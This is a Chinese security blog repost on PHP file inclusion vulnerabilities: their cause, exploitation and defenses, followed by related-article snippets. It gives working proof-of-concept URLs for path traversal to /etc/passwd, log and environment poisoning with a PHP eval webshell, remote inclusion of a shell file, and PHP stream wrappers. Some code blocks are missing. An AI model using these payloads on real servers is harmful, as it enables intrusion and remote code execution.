代码安全之文件包含

最新推荐文章于 2024-02-26 10:30:00 发布
转载 最新推荐文章于 2024-02-26 10:30:00 发布 · 654 阅读 · 0

本文详细解析了PHP文件包含漏洞的成因与利用方式,并提供了有效的防御措施。介绍了本地文件包含与远程文件包含的不同场景及POC示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞成因

PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。

PHP文件包含漏洞代码

以上代码保存为 http://www.test.com/index.php

本地文件包含

包含系统文件

windows

linux

普通权限:


root权限:


获取webshell
包含web日志文件

1 访问连接 http://www.test.com/<?php eval(POST_['test']) ?>

2 使用菜刀连接 http://www.test.com/index.php?func=/var/log/apache/access.log

这种方式有一个弊端,由于access的日志文件比较大,所以webshell可能会很慢甚至卡死

包含ssh登入日志

如果web服务器开启了ssh,且我可以使用putty连接其端口,我们可以尝试连接,使用<?php eval(POST_['test']) ?>作为用户名,然后在登录失败后,用户名会被记录在ssh的失败登入日志(/var/log/auth.log)中,我们可以包含这个日志文件获取webshell。

包含环境变量

我们在user-agent中插入一句话,然后访问web服务器,在/proc/self/environ中会包含我们的user-agent信息,然后我们可以包含该文件获取webshell。下面是该文件的内容:


包含用户上传文件

包含图片

用户上传图片功能是web服务网站最常用的功能,没什么好说的

包含压缩包

上传一个包含一句话的rar压缩包,这个功能在php版本大于5.30下可以利用

【POC】http://www.test.com/index.php?file=phar://test.rar/test.txt

远程文件包含

利用方式

包含远程服务器文件
利用条件

需要allow_url_fopen=On并且 allow_url_include=On

POC
【POC】http://www.test.com/index.php?file=[http|https|ftp]://example.com/shell.txt
利用PHP流
利用条件

需要allow_url_include=On

利用方式

【POC】 http://www.test.com/index.php?file=php://input

【POC】 http://www.test.com/index.php?file=php://filter/convert.base64-encode/resource=index.php

【POC】 http://www.test.com/index.php?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=

对于有限制的文件包含

包含脚本

<?php include($_GET['file'] . ".htm"); ?>

突破方式

00截断
利用条件

需要 magic_quotes_gpc=off,PHP小于5.3.4有效

利用方式

【POC】http://www.test.com/index.php?file=../../../../../../../../../etc/passwd

超长文件名截断
利用条件

php版本小于5.2.8(?)可以成功,linux需要文件名长于4096,windows需要长于256

利用方式

【POC】http://www.test.com/index.php?file=../../../../../../../../../etc/passwd/././././././.[…]/./././././.

点号截断
利用条件

php版本小于5.2.8(?)可以成功,只适用windows,点号需要长于256

利用方式

【POC】http://www.test.com/index.php?file=../../../../../../../../../boot.ini/………[…]…………

防御措施

1 尽量不要用户控制文件包含的参数

2 开启open_basedir函数,将其设置为指定目录,则只有该目录的文件允许被访问。

3 关闭allow_url_include函数,防止远程文件包含。

4 包含文件白名单限制

不同语言有包含功能的函数

PHP

include()
include_once()
require()
require_once()
fopen()
readfile()
jsp
include:
 <%@ include file="body.jsp"%>
jsp:include:
<jsp:include page="head.jsp"/>
采用JSTL: 
<c:import url="http://thief.one/1.jsp">
asp
<!--#include file="1.asp" -->
aspx
<!--#include file="top.aspx" -->

                

        

         

    

    
  



    



                



	

		

			

				
					
第二阶段 PHP代码审计之文件包含

				
			

			

				

					qq_22132931的博客
				

				

					11-20
					
					851
					
				

			

		

		

			
				
PHP代码审计之文件包含

			
		

	



                

            
              



	

		

			

				
					
文件包含

				
			

			

				

					嘻嘻哈哈
				

				

					01-12
					
					7978
					
				

			

		

		

			
				
文件包含原理


文件包含 
开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含
文件包含漏洞 
开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞




文件包含分类


本地文件包含 
包含服务器本身存在的恶意文件 
a.txt

 phpinfo()

			
		

	



              


  
              

                


	

		

			

				
					
DVWA系列之File Inclusion(文件包含)源码分析及漏洞利用

				
			

			

				

					7Riven's blog
				

				

					11-27
					
					1440
					
				

			

		

		

			
				
什么是文件包含?
程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含文件包含漏洞的成因
随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变 量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过...

			
		

	





	

		

			

				
					
包含文件(Include file)

				
			

			

				

					weixin_34054866的博客
				

				

					12-20
					
					365
					
				

			

		

		

			
				
包含文件可以包含不想出现在主源单元中的任何代码。其典型的用法就是保留常数或编译器指令,这些在一个工程的其他文件中都会用到。  包含文件只是一个用INC扩展名的文本文件。INC扩展名也不是必须的,仅仅是一个惯例。  下面我们将通过一个Hello, World演示,来说明包含文件的使用。  1、我们来新建一个Console Application,通过菜单【File | New | Others…】打...

			
		

	



		

			
		



	

		

			

				
					
文件包含代码执行及命令执行

				
			

			

				

					j1044957016的博客
				

				

					06-01
					
					2925
					
				

			

		

		

			
				
文件包含代码执行,命令执行常见的函数,以及如何绕过过滤

			
		

	





	

		

			

				
					
文件包含介绍以及代码分析

				
			

			

				

					weixin_42140534的博客
				

				

					08-04
					
					815
					
				

			

		

		

			
				
0x01 文件包含介绍
文件包含漏洞是代码注入的一种,就是用户注入一段能控制的脚本或代码,并让服务端执行
0x02 文件包含函数
php文件包含主要由下面4种函数来完成的

include()
include_once()
require()
require_once
当使用这4种函数包含一个新文件时,文件将作为php代码执行,php内核并不会在意被包含文件时什么类型,即使包含的时txt文件,图片文件。远程URL,也都将作为PHP代码执行

区别
require()的使用方法如:require(“xxx.p

			
		

	





	

		

			

				
					
PHP代码审计之文件包含

				
			

			

				

					秋水的博客
				

				

					09-08
					
					1706
					
				

			

		

		

			
				
目录



漏洞简介

漏洞实现

文件包含之伪协议

漏洞实例

漏洞防御

漏洞简介

什么是文件包含?


在之前接触的python中,我们会通过import来导入一些公共资源

在PHP中,也有类似的函数,为了更好地使用代码的重用性,引入了文件包含函数,可以通过文件包含函数将文件包含进来,直接使用包含文件的代码

文件包含分文本地文件包含(Loacl File Inclusion,LFI...

			
		

	





	

		

			

				
					
奇安信代码卫士,文件上传漏洞解决demo

				
			

			

				

					04-23
				

			

		

		

			
				
奇安信代码卫士,文件上传漏洞解决demo; #### 文件上传可以参考以下安全需求进行处理: 1. 服务器配置: (1)将上传目录和上传文件设置为不可执行, 杜绝脚本执行。 (2)应保证服务器安全,避免文件解析漏洞。 2....

			
		

	





	

		

			

				
					
web网站文件包含漏洞和攻击-运维安全详细笔记总结

				
			

			

				

					06-30
				

			

		

		

			
				
web 网站文件包含漏洞和攻击-运维安全详细笔记总结  文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...

			
		

	





	

		

			

				
					
第52天:代码审计-PHP项目类RCE及文件包含下载删除1

				
			

			

				

					08-03
				

			

		

		

			
				
本文主要探讨了PHP项目中常见的安全漏洞类型,包括远程代码执行(RCE)、文件包含、下载、删除等,并提供了相关的漏洞利用关键字和实例分析。  首先,SQL注入是由于不当处理用户输入导致的数据库操作漏洞。关键词如`...

			
		

	





	

		

			

				
					
Matlab p代码与p文件的转换及解密工具解析

					
最新发布

				
			

			

				

					05-31
				

			

		

		

			
				
内容概要:本文详细介绍了Matlab中p代码和p文件的概念及其重要性,探讨了p代码与p文件之间的相互转换方法,包括p文件转m文件的具体操作步骤,并介绍了市场上存在的p代码解密工具及其合法使用的注意事项。此外,还...

			
		

	





	

		

			

				
					
文件包含学习

				
			

			

				

					weixin_73760178的博客
				

				

					09-21
					
					143
					
				

			

		

		

			
				
文件包含是什么:

开发人员需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少代码冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer等



漏洞产生的原因:

文件包含函数加载的参数没有经过过滤或严格定义,可以被用户控制,包含其他恶意文件,导致了执行非预期代码



php中的文件包含的函数:

1. require组

require:函数出现错误时,会直接报错并退出程序执行。

require_once:出错时直接退出;仅包含一次。在脚

			
		

	





	

		

			

				
					
【DVWA系列】四、File Inclusion 文件包含(源码分析&漏洞利用)

				
			

			

				

					Pluto.的博客
				

				

					03-12
					
					501
					
				

			

		

		

			
				
文章目录DVWAFile Inclusion 文件包含一、low 级别二、medium 级别三、high 级别四、impossible 级别
DVWA
File Inclusion 文件包含

一、low 级别

无任何安全防护措施

观察url参数,通过点击页面的三个文件,确定包含文件的参数为 page:

尝试修改参数,包含一个不存在的文件 page=test.php:

可以看到,发生了报错,并且把网站的路径都给暴露出来了。
尝试远程包含,在另一个服务器上搭建一个一句话木马文件,包含该文件:

成功包

			
		

	





	

		

			

				
					
文件包含漏洞分析和防御

				
			

			

				

					1ance's blog
				

				

					05-03
					
					959
					
				

			

		

		

			
				
目录简介形成原因判断类型文件包含文件读取:其他防御
简介
文件包含是一个功能,当前文件可以包含外部文件进行引用,方便开发,可以看成类似导入模块、引用lib,dll等。
形成原因
文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时,没有对传入的文件名或路径进行合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。
判断类型
当?file的参数值为PHP文件时:
1.文件被解析,则是文件包含漏洞
2.显示源代码,则是文件查看漏洞
3.提示下载,则是文件下载漏洞
文件包含
php

			
		

	





	

		

			

				
					
文件操作之文件包含全解(31)

				
			

			

				

					san3144393495的博客
				

				

					06-01
					
					1155
					
				

			

		

		

			
				
文件包含的作用就是将这个文件包含进去之后,会调用指定文件的代码。先将文件包含才能执行里面的一些相关代码,比如所想进行文件的链接,数据库的查询,就可以先包含一个数据库的配置文件, 再去链接的话就享有配置文件的一些配置信息,就不需要在进行相关的操作。它可以把一些功能性代码写到一个文件里面,然后用另外一个文件去包含这个文件,这样子就不再重复书写那个包含文件里面的代码。==#include file=”top.aspx”-->   这个aspx运行,包含了一个top.aspx文件。>    php的写法。

			
		

	





	

		

			

				
					
宏定义-“文件包含”处理

				
			

			

				

					office_lgirl的博客
				

				

					02-26
					
					459
					
				

			

		

		

			
				
宏定义-“文件包含”处理
所谓“文件包含”处理是指一个源文件可以将另外一个源文件的全部内容包含进来,即将另外的文件包含到本文件之中。C语言提供了#include命令用来实现“文件包含”的操作。其一般形式为
# include"文件名"
或
#include 

			
		

	





	

		

			

				
					
ASP包含文件#include 方法详解

				
			

			

				

					千慧的专栏
				

				

					03-07
					
					4971
					
				

			

		

		

			
				
SSI 指令为用户提供在 Web 服务器处理之前将一个文件的内容插入到另一个文件的方法。ASP 只使用这一机制的 #include 指令。要在 .asp 文件中插入一个文件,使用下面的语法:   virtual 和 file 关键字指示用来包含该文件的路径的类型,filename 是您想包含的文件的路径和名称。 被包含文件不要求专门的文件扩展名;但是,为被包含文件赋予 .inc 扩展名

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值